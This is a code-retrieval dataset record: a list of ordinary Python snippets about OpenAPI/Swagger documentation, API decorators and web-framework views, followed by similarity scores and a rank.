{}\n if response_code:\n override_kw['responses'] = {\n response_code: response_serializer()\n }\n if operation_description:\n override_kw['operation_description'] = operation_description\n else:\n override_kw['operation_description'] = str(func.__doc__ or '').strip() # type: ignore\n return swagger_auto_schema(**override_kw)(func_object) # type: ignore\n\n return decorator", "def openapi_view(view: View, info: ViewDeriverInfo) -> View:\n if info.options.get(\"openapi\"):\n\n def wrapper_view(context: Context, request: Request) -> Response:\n # We need this to be able to raise AttributeError if view code\n # accesses request.openapi_validated on a view that is marked\n # with openapi=False\n request.environ[\"pyramid_openapi3.enabled\"] = True\n\n # If view is marked with openapi=True (i.e. 
we are in this\n # function) and registry settings are not set to disable\n # validation, then do request/response validation\n request.environ[\"pyramid_openapi3.validate_request\"] = asbool(\n request.registry.settings.get(\n \"pyramid_openapi3.enable_request_validation\", True\n )\n )\n request.environ[\"pyramid_openapi3.validate_response\"] = asbool(\n request.registry.settings.get(\n \"pyramid_openapi3.enable_response_validation\", True\n )\n )\n\n # Request validation can happen already here, but response validation\n # needs to happen later in a tween\n if request.openapi_validated and request.openapi_validated.errors:\n raise RequestValidationError(errors=request.openapi_validated.errors)\n\n # Do the view\n return view(context, request)\n\n return wrapper_view\n return view", "def PublicAPI(*args, **kwargs):\n if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):\n return PublicAPI(stability='stable')(args[0])\n if 'stability' in kwargs:\n stability = kwargs['stability']\n assert stability in ['stable', 'experimental'], stability\n elif kwargs:\n raise ValueError(f'Unknown kwargs: {kwargs.keys()}')\n else:\n stability = 'stable'\n\n def wrap(obj):\n if stability == 'experimental':\n message = f'PublicAPI ({stability}): This API is {stability} and may change before becoming stable.'\n else:\n message = 'PublicAPI: This API is stable across Ludwig releases.'\n _append_doc(obj, message=message)\n _mark_annotated(obj)\n return obj\n return wrap", "def _write_member_documentation_pages(\n documenter: sphinx.ext.autodoc.Documenter):\n for entry in _get_documenter_members(documenter):\n if entry.is_inherited:\n continue\n if (entry.overload and entry.overload.overload_id and\n re.fullmatch('[0-9]+', entry.overload.overload_id)):\n logger.warning('Unspecified overload id: %s', entry.object_name)\n member_rst_path = os.path.join(documenter.env.app.srcdir, 'python', 'api',\n entry.page_name + '.rst')\n objtype = entry.documenter.objtype\n member_content = ''\n if objtype == 'class':\n member_content += ':duplicate-local-toc:\\n\\n'\n member_content += sphinx_utils.format_directive(\n 'tensorstore-python-apidoc',\n options=dict(\n fullname=entry.full_name,\n objtype=objtype,\n importname=entry.import_name,\n objectdescription=True,\n subscript=entry.subscript,\n overload=cast(ParsedOverload, entry.overload).overload_id,\n ),\n )\n pathlib.Path(member_rst_path).write_text(member_content)\n _write_member_documentation_pages(entry.documenter)", "def test_successful_parse_undocumented_endpoints(monkeypatch) -> None:\n monkeypatch.setattr(django_settings, 'SWAGGER_TESTER', {'PATH': yml_path})\n monkeypatch.setattr('django_swagger_tester.static_schema.loader.LoadStaticSchema.get_schema', ret_schema)\n for url in ['/api/v1/cars/incorrect/', '/api/v1/trucks/incorrect/']:\n base = LoadStaticSchema(url, 'get', status_code=200)\n base.get_response_schema()", "def get_openapi_spec(self):\n\n spec = {\"operationId\": snake_to_camel(self._wrapped_function.__name__), \"responses\": {}}\n\n if self._doc.short_description:\n spec[\"summary\"] = self._doc.short_description\n\n if self._doc.long_description:\n spec[\"description\"] = self._doc.long_description\n\n if self._tags:\n spec[\"tags\"] = self._tags\n\n if self._path_parameters or self._query_parameters:\n spec[\"parameters\"] = []\n\n for name, param_type in self._path_parameters.items():\n if self._is_param_ignored(name):\n continue\n\n param_spec = {\n \"name\": name,\n \"in\": \"path\",\n \"required\": True,\n \"schema\": {\"type\": 
self._extension.PARAMETER_TYPE_MAP.get(param_type, \"string\")},\n }\n\n param_doc = self._get_param_doc(name)\n if param_doc is not None:\n param_spec[\"description\"] = param_doc.description\n\n spec[\"parameters\"].append(param_spec)\n\n for name, param_type in self._query_parameters.items():\n param_refl: inspect.Parameter = self._signature.parameters[name]\n param_spec = {\n \"name\": name,\n \"in\": \"query\",\n \"required\": param_refl.default == inspect.Parameter.empty,\n \"schema\": {\"type\": self._extension.PARAMETER_TYPE_MAP.get(param_type, \"string\")},\n }\n\n param_doc = self._get_param_doc(name)\n if param_doc is not None:\n param_spec[\"description\"] = param_doc.description\n\n spec[\"parameters\"].append(param_spec)\n\n if self._request_body_parameter:\n mimetypes = self._request_body_content_types\n\n spec[\"requestBody\"] = {\n \"content\": {\n mimetype: {\"schema\": self._process_model_schema(self._request_body_class)} for mimetype in mimetypes\n },\n \"required\": True,\n }\n\n if issubclass(self._request_body_class, ExamplesMixin):\n for mimetype in mimetypes:\n spec[\"requestBody\"][\"content\"][mimetype][\"examples\"] = model_examples_to_openapi_dict(\n self._request_body_class\n )\n\n param_doc = self._get_param_doc(self._request_body_parameter)\n if param_doc is not None and param_doc.description:\n spec[\"requestBody\"][\"description\"] = param_doc.description\n\n spec[\"x-codegen-request-body-name\"] = \"body\"\n elif self._request_body_file_type:\n spec[\"requestBody\"] = {\n \"content\": {self._request_body_file_type: {\"schema\": {\"type\": \"string\", \"format\": \"binary\"}}}\n }\n\n if self._security:\n spec[\"security\"] = self._security\n\n for response_class, codes in self._responses.items():\n for code, response_data in codes.items():\n if issubclass(response_class, FileResponse):\n mime = response_data.mimetype or \"application/octet-stream\"\n spec[\"responses\"][str(code)] = {\n \"description\": response_data.description or response_class.__name__,\n \"content\": {mime: {\"schema\": {\"type\": \"string\", \"format\": \"binary\"}}},\n }\n else:\n spec[\"responses\"][str(code)] = {\n \"description\": response_data.description or response_class.__name__,\n \"content\": {\"application/json\": {\"schema\": self._process_model_schema(response_class)}},\n }\n\n if issubclass(response_class, ExamplesMixin):\n # fmt: off\n spec[\"responses\"][str(code)][\"content\"][\"application/json\"][\"examples\"] = \\\n model_examples_to_openapi_dict(response_class)\n # fmt: on\n\n return spec", "def __call__(self, doc: Doc) -> Doc:\n return doc", "def __call__(self, doc: Doc) -> Doc:\n return doc", "def swagger_validate(f):\n @wraps(f)\n def swagger_validated_function(*args, **kwargs):\n converted_uri = request.path\n # convert /pet/mypetsid to /pet/{petId}\n for key, value in request.view_args.items():\n target = '{{{0}}}'.format(key)\n converted_uri = converted_uri.replace(str(value), target)\n # Grab the swagger spec for this specific uri and request type\n request_spec = spec.get_op_for_request(\n request.method.lower(), converted_uri)\n # cycle through the params and check any params that are set or required\n # by the schema\n for param in request_spec.params.values():\n param_spec = get_param_type_spec(param)\n # TODO - grab out other request types that we care about\n param_value = None\n if param.location == 'formData':\n param_value = request.form.get(param.name)\n elif param.location == 'path':\n param_value = request.view_args.get(param.name)\n if 
param_value or param.required:\n try:\n validate_schema_object(spec, param_spec, param_value)\n except Exception as e:\n abort(400, str(e))\n return f(*args, **kwargs)\n return swagger_validated_function", "def with_docs(self):\r\n self._configurations.append('javadoc')\r\n return self", "def configure_apispec(app):\n pass", "async def docs(self, ctx):\n embed = discord.Embed(title = \"Documentation\", description = \"[Click here to visit our documentation!](https://dhb-documentation.readthedocs.io/en/latest/index.html)\", color = discord.Color.blurple())\n await ctx.send(embed = embed)", "def __call__(self, doc):\n return doc", "def custom_openapi() -> Dict:\n if app.openapi_schema:\n return app.openapi_schema\n openapi_schema = get_openapi(\n title=\"The GenomicMedLab Cool Seq Tool\",\n version=__version__,\n description=\"Common Operations On Lots-of Sequences Tool.\",\n routes=app.routes\n )\n\n openapi_schema[\"info\"][\"contact\"] = {\n \"name\": \"Alex H. Wagner\",\n \"email\": \"Alex.Wagner@nationwidechildrens.org\",\n \"url\": \"https://www.nationwidechildrens.org/specialties/institute-for-genomic-medicine/research-labs/wagner-lab\" # noqa: E501\n }\n app.openapi_schema = openapi_schema\n return app.openapi_schema", "def init_doc(self):\n raise NotImplementedError()", "def _mock_swagger(cls):\n\n swagger_patcher = patch(\n 'manager_rest.rest.swagger.add_swagger_resource'\n )\n cls._patchers.append(swagger_patcher)", "def func_doc():", "def decorator(func):\n def wrapper(resource, request, ** kwargs):\n \"\"\" wraps the method with common api response's routines, like\n checking if it's authenticated or packing the response in an api\n friendly way\n\n \"\"\"\n # ckech if everything is ok, before proceding\n resource.method_check(request, allowed=expected_methods)\n resource.is_authenticated(request)\n resource.throttle_check(request)\n\n # call the decorated method\n result = func(resource, request, **kwargs)\n\n # if a single response is expected\n if single:\n if returns_extra_data:\n objt = result[0]\n else:\n objt = result\n bundle = resource.build_bundle(obj=objt, request=request)\n to_be_serialized = resource.full_dehydrate(bundle)\n if returns_extra_data:\n to_be_serialized.data.update(result[1])\n else: # if we are expecting an array of objects\n # we need to paginante\n paginator = resource._meta.paginator_class(\n request.GET,\n result,\n resource_uri=resource.get_resource_uri(),\n limit=resource._meta.limit,\n max_limit=resource._meta.max_limit,\n collection_name=resource._meta.collection_name)\n\n to_be_serialized = paginator.page()\n\n bundles = [resource.build_bundle(obj=obj, request=request)\n for obj in to_be_serialized['objects']]\n\n to_be_serialized['objects'] = [resource.full_dehydrate(bnd)\n for bnd in bundles]\n\n resource.log_throttled_access(request)\n return resource.create_response(request, to_be_serialized)\n return wrapper", "def get(self, request, format=None):\n an_apiview = [\n 'Uses HTTP methods as functions(get, post, patch, put, delete)',\n 'Is similar to traditional Django view',\n 'Give you the most control over your app logic',\n 'Is mapped manually to URLs'\n ]\n return Response({'message':'Hello!', 'an_apiview':an_apiview})", "def factory_functions(self, route, docstring=\"\"):\n def generic_function(**kwargs):\n return self._get(route, params=kwargs)\n generic_function.__doc__ = docstring\n return generic_function", "def includeme(config):\n\n document_path = config.registry.settings['{}.document'.format(MODULE_NAME)]\n\n definition = 
api.Api(document_path)\n config.registry.registerUtility(definition, api.IApi)\n\n config.add_directive('set_media_renderer', api.set_media_renderer)\n config.add_directive('add_deserializer', api.add_deserializer)\n config.add_directive('set_media_deserializer', api.set_media_deserializer)\n\n config.add_view(\n views.exception_view,\n context=Exception,\n renderer='json',\n )\n config.add_view(\n views.http_exception_view,\n context=pyramid.httpexceptions.HTTPException,\n renderer='json',\n )\n\n return None", "def docs():", "def wrapper(*args, **kwargs):\n print(f\"you are calling the {fn.__name__} function\")\n print(f\"Here's the documentation: {fn.__doc__}\")\n return fn(*args, **kwargs)", "def get_specs(self, prefix='', status=200, **kwargs):\n return self.get_json('{0}/swagger.json'.format(prefix), status=status, **kwargs)", "def add_documentation(cls, documentation):\n cls.__doc__ = documentation.CBAMLibrary\n methods = list(filter(lambda x: not x.startswith(\"_\"), dir(cls)))\n for method_name in methods:\n method = getattr(cls, method_name)\n if callable(method):\n name = method.__name__\n if hasattr(documentation, name):\n getattr(cls, name).__doc__ = getattr(documentation, name)", "def get_documentation(self, css_path=None, base_url=None):\n if base_url is None:\n first_key = next(iter(self.conf_doc))\n conf = self.conf_doc[first_key]\n else:\n conf = self.conf_doc[\"/\" + base_url]\n\n return (\n 200,\n \"\"\"<!DOCTYPE html>\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <title>%s</title>\n <meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\"/>\n <meta name=\"viewport\" content=\"width=device-width\" />\n <style>%s</style>\n %s\n </head>\n <body>\n <aside>%s</aside>\n <main>%s</main>\n <section id=\"operations\">%s</section>\n <footer>%s</footer>\n </body>\n</html>\"\"\"\n % (\n self.__title(conf),\n self.__css(),\n self.__css_path(css_path),\n self.__sidebar(conf),\n self.__header(conf),\n self.__operations(conf),\n self.__footer(),\n ),\n )", "def get(self,request,format = None):\n an_apiview = [\n 'Uses HTTP methods as function (get,post,patch,put,delete)',\n 'Is similar to a traditional Django View',\n 'Gives you the most control over your appliction logic',\n 'Is mapped manually to URLs'\n ]\n return Response({'message':'Hello!','an_apiview': an_apiview})", "def api():\n api_routes = [\n \"/api/v1.0/beer\",\n \"/api/v1.0/breweries\",\n ]\n return render_template(\"api.html\", api_routes = api_routes)", "def write_api_docs(self, outdir):\r\n if not os.path.exists(outdir):\r\n os.mkdir(outdir)\r\n # compose list of modules\r\n modules = self.discover_modules()\r\n self.write_modules_api(modules,outdir)", "def generate_swagger_html(swagger_static_root, swagger_json_url):\n tmpl = _get_template(\"swagger.html\")\n return tmpl.render(\n swagger_root=swagger_static_root, swagger_json_url=swagger_json_url\n )", "def path_helper(self, operations, resource, base_path=None, suffix=None, **kwargs):\n resource_uri_mapping = self._generate_resource_uri_mapping(self._app, resource, suffix)\n\n if not resource_uri_mapping:\n raise APISpecError(\"Could not find endpoint for resource {0}\".format(resource))\n\n operations.update(yaml_utils.load_operations_from_docstring(resource.__doc__) or {})\n\n # In case multiple uri were found, keep the only one that has methods\n try:\n path = next(uri for uri, methods in resource_uri_mapping.items() if methods)\n except StopIteration:\n path = next(iter(resource_uri_mapping))\n\n methods = 
resource_uri_mapping[path]\n\n if base_path is not None:\n # make sure base_path accept either with or without leading slash\n # swagger 2 usually come with leading slash but not in openapi 3.x.x\n base_path = '/' + base_path.strip('/')\n path = re.sub(base_path, \"\", path, 1)\n\n for method_name, method_handler in methods.items():\n docstring_yaml = yaml_utils.load_yaml_from_docstring(method_handler.__doc__)\n operations[method_name] = docstring_yaml or dict()\n return path", "def main(global_config, **settings):\n config = Configurator(settings=settings)\n \n config.add_route('decorated_without_definitions', '/decorated-without-definitions')\n\n config.add_route('simple_docrequest', '/simple-docrequest')\n\n config.add_route('choices_docrequest', '/choices-docrequest')\n\n config.add_route('list_docrequest', '/list-docrequest')\n\n config.add_route('with_url_param', '/with-url-param/{url_param}')\n\n config.scan()\n return config.make_wsgi_app()", "def process_api_declaration(self, resources, resource, context):\n pass", "def api():\n\treturn \"The API call\"", "def expose(self, model, route='/api', access_control=None, resource_class=Resource, **kwargs):\n endpoint_path = route + '/' + inflection.pluralize(inflection.underscore(model.__name__))\n endpoint = endpoint_path\n resource = Resource(model=model, access_control=access_control)\n self._add_api_method(endpoint_path, resource.list_,\n methods=['GET'], endpoint=endpoint + '/list')\n self._add_api_method('%s/<id>' % endpoint_path, resource.get_,\n methods=['GET'], endpoint=endpoint + '/get')\n\n self._add_api_method(endpoint_path, resource.put_,\n methods=['PUT'], endpoint=endpoint + '/put')\n\n self._add_api_method('%s/<id>' % endpoint_path, resource.delete_,\n methods=['DELETE'], endpoint=endpoint + '/delete')\n\n self._add_api_method(endpoint_path, resource.post_,\n methods=['POST'], endpoint=endpoint + 'post')\n\n self._add_api_method('%s/<id>' % endpoint_path, resource.patch_,\n methods=['PATCH'], endpoint=endpoint + 'patch')", "def api_method(func):\n @wraps(func)\n def decorator(self, return_request_args=False, *args, **kwargs):\n request_args = func(self, *args, **kwargs)\n request_args.update({\n 'method': '{module}.{method}'.format(\n module=self.__class__.__name__,\n method=func.__name__)})\n request_args = self._preprocess(request_args)\n if return_request_args:\n return request_args\n else:\n return self.pa.request(**request_args)\n return decorator", "def _openapi_redoc(self):\n redoc_url = self.app.config.get('OPENAPI_REDOC_URL', None)\n redoc_version = self.app.config.get('OPENAPI_REDOC_VERSION', 'next')\n if redoc_url is None:\n redoc_url = (\n 'https://cdn.jsdelivr.net/npm/redoc@'\n '{}/bundles/redoc.standalone.js'.format(redoc_version))\n return render_template('redoc.html',\n title=self.app.config.get('API_TITLE', self.app.name),\n redoc_url=redoc_url)", "def document_collection(resource, path, root_discovery, discovery, css=CSS):\n collections = []\n methods = []\n resource_name = path.split(\".\")[-2]\n html = [\n \"<html><body>\",\n css,\n \"<h1>%s</h1>\" % breadcrumbs(path[:-1], root_discovery),\n \"<h2>Instance Methods</h2>\",\n ]\n\n # Which methods are for collections.\n for name in dir(resource):\n if not name.startswith(\"_\") and callable(getattr(resource, name)):\n if hasattr(getattr(resource, name), \"__is_resource__\"):\n collections.append(name)\n else:\n methods.append(name)\n\n # TOC\n if collections:\n for name in collections:\n if not name.startswith(\"_\") and callable(getattr(resource, 
name)):\n href = path + name + \".html\"\n html.append(\n string.Template(COLLECTION_LINK).substitute(href=href, name=name)\n )\n\n if methods:\n for name in methods:\n if not name.startswith(\"_\") and callable(getattr(resource, name)):\n doc = getattr(resource, name).__doc__\n params = method_params(doc)\n firstline = doc.splitlines()[0]\n html.append(\n string.Template(METHOD_LINK).substitute(\n name=name, params=params, firstline=firstline\n )\n )\n\n if methods:\n html.append(\"<h3>Method Details</h3>\")\n for name in methods:\n dname = name.rsplit(\"_\")[0]\n html.append(method(name, getattr(resource, name).__doc__))\n\n html.append(\"</body></html>\")\n\n return \"\\n\".join(html)", "def format_method(cls, **kwargs): \n _doc_formatter = cls._format_obj(**kwargs) \n ## using functools.wraps: this will work but the method type of any bounded\n ## function (static, instance or class method) is also altered\n #def _func_decorator(func):\n # new_func = functools.wraps(func)(func)\n # new_func.__doc__ = _doc_formatter(func)\n # return new_func\n try:\n assert USE_WRAPT_OR_NOT and wrapt\n except: \n class _func_decorator(__MethodDecorator):\n def __init__(self, func, obj=None, cls=None, method_type='function'):\n #super(_func_decorator,self).__init__(func, obj=obj, cls=cls, method_type=method_type)\n __MethodDecorator.__init__(self, func, obj=obj, cls=cls, method_type=method_type)\n # we had one attribute wrt. a standard method_decorator instance\n setattr(self,'__doc__',_doc_formatter(self.func))\n def __getattribute__(self, attr_name): \n # we ensure that the docstring which is the __doc__ attribute of the\n # decorator, not that of the function itself\n if attr_name in ('__doc__',):\n return object.__getattribute__(self, attr_name) \n # otherwise behaves like the superclass class\n #return super(_func_decorator,self).__getattribute__(attr_name)\n return __MethodDecorator.__getattribute__(self, attr_name)\n else:\n def _func_decorator(func):\n #@my_wrapper\n #def new_func(*_args, **_kwargs):\n # return func(*_args, **_kwargs)\n new_func = method_decorator(func)\n #new_func = method_wrapper(func)\n # now we update the '__doc__' by recycling the doc already commited in \n # the FunctionWrapper object new_func: this enables avoiding issues when\n # dealing with classmethod or staticmethod methods:\n # \"AttributeError: 'classmethod' object attribute '__doc__' is read-only\"\n try: # write on the wrapper...\n new_func.__doc__ = _doc_formatter(new_func)\n except: \n # still, we allow this type of error, as it may occur in the case the\n # order of closures was not well set, e.g. 
by implementing:\n # @classmethod\n # @Docstring.format_class(**kwargs)\n # instead of:\n # @Docstring.format_class(**kwargs)\n # @classmethod\n pass\n return new_func\n return _func_decorator", "def test_basic_api_inline_swagger(self):\n self.create_and_verify_stack(\"single/basic_api_inline_swagger\")\n\n first_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(first_dep_ids), 1)\n\n body = self.get_template_resource_property(\"MyApi\", \"DefinitionBody\")\n body[\"basePath\"] = \"/newDemo\"\n self.set_template_resource_property(\"MyApi\", \"DefinitionBody\", body)\n self.update_stack()\n\n second_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(second_dep_ids), 1)\n\n self.assertEqual(len(set(first_dep_ids).intersection(second_dep_ids)), 0)", "def test_callable_urlconf(self):\n\n def urlpatterns():\n return (\n path(\"admin/doc/\", include(\"django.contrib.admindocs.urls\")),\n path(\"admin/\", admin.site.urls),\n )\n\n with self.settings(ROOT_URLCONF=SimpleLazyObject(urlpatterns)):\n response = self.client.get(reverse(\"django-admindocs-views-index\"))\n self.assertEqual(response.status_code, 200)", "def doc(api_url):\n res, status = dh.get_index(css_path), 404\n if any(\n api_u in \"/\" + api_url for api_u, api_dict in am.all_conf.items()\n ):\n # documentation\n if any(\n api_u == \"/\" + api_url\n for api_u, api_dict in am.all_conf.items()\n ):\n status, res = dh.get_documentation(css_path, api_url)\n return res, status\n # api calls\n else:\n cur_call = \"/\" + api_url\n format = request.args.get(\"format\")\n content_type = (\n \"text/csv\"\n if format is not None and \"csv\" in format\n else \"application/json\"\n )\n\n op = am.get_op(\n cur_call\n + \"?\"\n + unquote(request.query_string.decode(\"utf8\"))\n )\n if type(op) is Operation: # Operation found\n status, res, c_type = op.exec(content_type=content_type)\n else: # HTTP error\n status, res, c_type = op\n\n if status == 200:\n response = make_response(res, status)\n response.headers.set(\"Content-Type\", c_type)\n else:\n # The API Manager returns a text/plain message when there is an error.\n # Now set to return the header requested by the user\n if content_type == \"text/csv\":\n si = StringIO()\n cw = writer(si)\n cw.writerows(\n [[\"error\", \"message\"], [str(status), str(res)]]\n )\n response = make_response(si.getvalue(), status)\n response.headers.set(\n \"Content-Disposition\",\n \"attachment\",\n filename=\"error.csv\",\n )\n else:\n m_res = {\"error\": status, \"message\": res}\n mes = dumps(m_res)\n response = make_response(mes, status)\n response.headers.set(\n \"Content-Type\", content_type\n ) # overwrite text/plain\n\n # allow CORS anyway\n response.headers.set(\"Access-Control-Allow-Origin\", \"*\")\n response.headers.set(\"Access-Control-Allow-Credentials\", \"true\")\n\n return response\n else:\n return res, status", "def __call__(self,\n comment,\n file,\n ):\n optional_kwargs = {}\n\n return BaseAPIEndpoint.__call__(self,\n comment=comment,\n file=file,\n **optional_kwargs\n )", "def ListaDeDocentesAPI(request):\n if request.method == 'GET':\n docentes = Docente.objects.all()\n serializer = DocenteSerializer(docentes, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = DocenteSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)", "def document(self):\n ...", "def 
minimal_swagger_dict():\n return {\n 'swagger': '2.0',\n 'info': {\n 'title': 'Test',\n 'version': '1.0',\n },\n 'paths': {\n },\n 'definitions': {\n },\n }", "def decorate_HTTP_verb_method(method):\n @functools.wraps(method)\n def wrapper(self, RIC_base_uri, **kwargs):\n partition = kwargs.pop('partition', '')\n name = kwargs.pop('name', '')\n sub_path = kwargs.pop('subPath', '')\n suffix = kwargs.pop('suffix', '')\n uri_as_parts = kwargs.pop('uri_as_parts', False)\n if uri_as_parts:\n REST_uri = generate_bigip_uri(RIC_base_uri, partition, name,\n sub_path, suffix, **kwargs)\n else:\n REST_uri = RIC_base_uri\n pre_message = \"%s WITH uri: %s AND suffix: %s AND kwargs: %s\" %\\\n (method.__name__, REST_uri, suffix, kwargs)\n logging.debug(pre_message)\n response = method(self, REST_uri, **kwargs)\n post_message =\\\n \"RESPONSE::STATUS: %s Content-Type: %s Content-Encoding:\"\\\n \" %s\\nText: %r\" % (response.status_code,\n response.headers.get('Content-Type', None),\n response.headers.get('Content-Encoding', None),\n response.text)\n logging.debug(post_message)\n if response.status_code not in range(200, 207):\n error_message = '%s Unexpected Error: %s for uri: %s\\nText: %r' %\\\n (response.status_code,\n response.reason,\n response.url,\n response.text)\n raise iControlUnexpectedHTTPError(error_message, response=response)\n return response\n return wrapper", "def _docs_params(**kwds):\n\n def dec(obj):\n obj.__orig_doc__ = obj.__doc__\n obj.__doc__ = dedent(obj.__doc__).format_map(kwds)\n return obj\n\n return dec", "def api_method(single=False, expected_methods=['get'],\n returns_extra_data=False):\n def decorator(func):\n \"\"\" The decorator applied to the endpoint \"\"\"\n def wrapper(resource, request, ** kwargs):\n \"\"\" wraps the method with common api response's routines, like\n checking if it's authenticated or packing the response in an api\n friendly way\n\n \"\"\"\n # ckech if everything is ok, before proceding\n resource.method_check(request, allowed=expected_methods)\n resource.is_authenticated(request)\n resource.throttle_check(request)\n\n # call the decorated method\n result = func(resource, request, **kwargs)\n\n # if a single response is expected\n if single:\n if returns_extra_data:\n objt = result[0]\n else:\n objt = result\n bundle = resource.build_bundle(obj=objt, request=request)\n to_be_serialized = resource.full_dehydrate(bundle)\n if returns_extra_data:\n to_be_serialized.data.update(result[1])\n else: # if we are expecting an array of objects\n # we need to paginante\n paginator = resource._meta.paginator_class(\n request.GET,\n result,\n resource_uri=resource.get_resource_uri(),\n limit=resource._meta.limit,\n max_limit=resource._meta.max_limit,\n collection_name=resource._meta.collection_name)\n\n to_be_serialized = paginator.page()\n\n bundles = [resource.build_bundle(obj=obj, request=request)\n for obj in to_be_serialized['objects']]\n\n to_be_serialized['objects'] = [resource.full_dehydrate(bnd)\n for bnd in bundles]\n\n resource.log_throttled_access(request)\n return resource.create_response(request, to_be_serialized)\n return wrapper\n return decorator", "def getHelp(self,func = None):\n if func == None:\n print(self.__doc__)\n pass\n else:\n print(func.__doc__)\n pass", "def api_endpoint(func: Callable[..., Any]) -> Callable[[], Response]:\n method, _, name = func.__name__.partition(\"_\")\n if method not in {\"get\", \"delete\", \"put\"}: # pragma: no cover\n raise ValueError(f\"Invalid endpoint function name: {func.__name__}\")\n validator = 
validate_func_arguments(func)\n\n @json_api.route(f\"/{name}\", methods=[method])\n @wraps(func)\n def _wrapper() -> Response:\n if validator is not None:\n if method == \"put\":\n request_json = request.get_json(silent=True)\n if request_json is None:\n raise FavaAPIError(\"Invalid JSON request.\")\n data = request_json\n else:\n data = request.args\n res = func(*validator(data))\n else:\n res = func()\n return json_success(res)\n\n return _wrapper", "def decorator(self, decorator: Route.Decorator):\n pass", "def get(self, request, format=None):\n\n an_apiview= [\n 'Uses HTTP methods as functions (get, post, patch, put, delete)',\n 'Is similar to a traditional Django View',\n 'Gives you the most control over your logic',\n 'Is mapped manually to URLs',\n 'Douki mohamed',\n ]\n\n return Response({'message': 'Hello Douki!', 'an_apiview': an_apiview})", "def output(self, resource):\n @wraps(resource)\n def wrapper(*args, **kwargs):\n rv = resource(*args, **kwargs)\n rv = self.responder(rv)\n return rv\n\n return wrapper" ]
[ "0.7308593", "0.67804843", "0.67267275", "0.6568308", "0.6500626", "0.6489433", "0.64708114", "0.64436257", "0.63863075", "0.6336464", "0.6331381", "0.6279588", "0.6140457", "0.6124011", "0.6117498", "0.6093394", "0.60924906", "0.60902476", "0.60646194", "0.6054501", "0.6027014", "0.60211873", "0.6004288", "0.5938166", "0.59238946", "0.59083325", "0.5893017", "0.5888402", "0.5886886", "0.5872275", "0.58521104", "0.5845897", "0.5823973", "0.5823973", "0.5823973", "0.58014905", "0.58009076", "0.58001184", "0.5794369", "0.57728714", "0.57677436", "0.5743728", "0.5733115", "0.5728148", "0.5727177", "0.571764", "0.5703117", "0.5702133", "0.56525373", "0.5639798", "0.5632026", "0.5598153", "0.5587369", "0.5587369", "0.55524343", "0.55517614", "0.55465037", "0.55433434", "0.5529697", "0.552758", "0.5525554", "0.55248535", "0.55210143", "0.55167913", "0.55079967", "0.5500769", "0.5471195", "0.5470788", "0.5469618", "0.5469156", "0.54565865", "0.54541284", "0.5443508", "0.54434085", "0.5435016", "0.54185265", "0.5413424", "0.5409794", "0.5409482", "0.53998184", "0.53970253", "0.5395056", "0.53946483", "0.5384517", "0.53587675", "0.53552926", "0.5354524", "0.53544176", "0.5354366", "0.5349263", "0.5346201", "0.5342313", "0.5340289", "0.53402835", "0.5322271", "0.5315195", "0.53085274", "0.53058285", "0.5301867", "0.5288942" ]
0.6823912
1
Decorator to be used in API methods to convert the request data to an instance of the passed `model`. This instance is passed to the decorated API endpoint as the parameter `service_params`.
def api_inputmodel(api: str, model: BaseModel, servicename: str,
                   service_logger: logger) -> Callable:

    def decorator(func):
        @wraps(func)
        async def function_wrapper(request, *args, **kwargs):
            try:
                service_params = model.parse_raw(request.body)
            except ValidationError as err:
                msg = (f'API: {api} - invalid params ({request.json}) passed '
                       f'to {servicename}: {err}')
                service_logger.warning(msg)
                raise PreconditionFailed(msg, status_code=412)
            result = await func(request=request,
                                service_params=service_params,
                                service_logger=service_logger,
                                *args, **kwargs)
            return result

        return function_wrapper

    return decorator
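A minimal usage sketch for the decorator above, assuming a Sanic app with a Pydantic request model; the route, model, and field names below are illustrative placeholders, a stdlib logger stands in for the original `logger`, and the decorator's own imports (wraps, ValidationError, PreconditionFailed) are assumed to be in scope:

import logging

from pydantic import BaseModel
from sanic import Sanic, response


class EchoParams(BaseModel):
    # illustrative request-body schema; the decorator parses it from request.body
    message: str
    repeat: int = 1


app = Sanic("demo")
service_logger = logging.getLogger("echo-service")


@app.post("/echo")
@api_inputmodel(api="/echo", model=EchoParams, servicename="echo-service",
                service_logger=service_logger)
async def echo(request, service_params: EchoParams, service_logger):
    # service_params is the validated EchoParams instance built from the raw body
    return response.json({"echo": [service_params.message] * service_params.repeat})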
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def api_outputmodel(api: str, model: BaseModel, servicename: str,\n service_logger: logger) -> Callable:\n\n def decorator(func):\n @wraps(func)\n async def function_wrapper(request, *args, **kwargs):\n service_result = await func(request, *args, **kwargs)\n try:\n if isinstance(service_result, model):\n result = service_result\n else:\n result = model(**service_result)\n output = response.json(result.dict())\n except Exception as err:\n msg = ('an internal error occured (service: '\n f'{servicename}, api: {api}): {err}')\n raise ServerError(msg)\n service_logger.info(f'processed result {result} => '\n f'{output.content_type} [{output.status}] '\n f'{output.body}')\n return output\n\n return function_wrapper\n\n return decorator", "def opt_model_create_rest_api():\n request_json = request.get_json()\n OptimModelRequestAPI(request_json).validate()\n return create_model_data(request_json)", "def model_to_instance(model):\n pass", "def forward(self, *args: Any, **kwargs: Any) -> Any:\n return self.model(*args, **kwargs)", "def param_converter(*decorator_args, **decorator_kwargs):\n def wrapped(fn):\n @wraps(fn)\n def decorated(*view_args, **view_kwargs):\n if Model is not None:\n view_kwargs = _convert_models(view_kwargs, decorator_kwargs)\n view_kwargs = _convert_query_params(view_kwargs, decorator_kwargs)\n return fn(*view_args, **view_kwargs)\n return decorated\n\n if decorator_args and callable(decorator_args[0]):\n return wrapped(decorator_args[0])\n return wrapped", "def convert_to_model(self, *args):\n services_data, *_ = args\n return [Service(**service) for service in services_data]", "def apply_model(model: BaseModel, **kwargs):\n raise NotImplementedError(f'Unknown model: {model}')", "def __call__(self, x, **kwargs):\n return self.model(x)", "def to_payload(self, model):\n return model", "def model(self, key, model_type:T, default=undefined, description=None, **kwargs) -> T:\n return self._process(key, description=description, default=default, cast=cast_pydantic(model_type),type=model_type, **kwargs)", "def _get_model(\n self,\n model: t.Type[api.ModelMixins],\n start: bool = True,\n auth: 